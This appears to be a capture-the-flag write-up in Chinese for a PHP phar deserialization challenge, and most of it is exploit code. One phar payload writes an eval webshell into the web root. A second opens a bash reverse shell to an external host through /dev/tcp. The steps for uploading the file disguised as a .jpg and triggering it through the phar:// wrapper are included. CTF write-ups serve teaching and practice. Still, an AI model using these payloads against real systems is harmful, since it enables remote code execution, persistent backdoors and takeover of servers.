class Flag{
    public $cmd;
}

$a=new Flag();
$a->cmd="echo \"<?=@eval(\\\$_POST['a']);\">/var/www/html/1.php";
$phar = new Phar("hacker.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

然后gzip命令压缩
上传成功后，访问

./class.php

使用phar伪协议读取上传文件

file=phar://upload/9e32fd5eb93d0766e32d9e33cc3ef2d5.jpg

执行成功后，访问写入的1.php，得到flag

方法二 反弹shell

exp

<?php
class Flag{
    public $cmd;
}

$a=new Flag();
$a->cmd="bash -c 'bash -i >& /dev/tcp/f57819674z.imdo.co/54789 0>&1'";
$phar = new Phar("hacker.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

然后就和方法一差不多，先gzip压缩改后缀，然后phar伪协议读取
成功反弹shell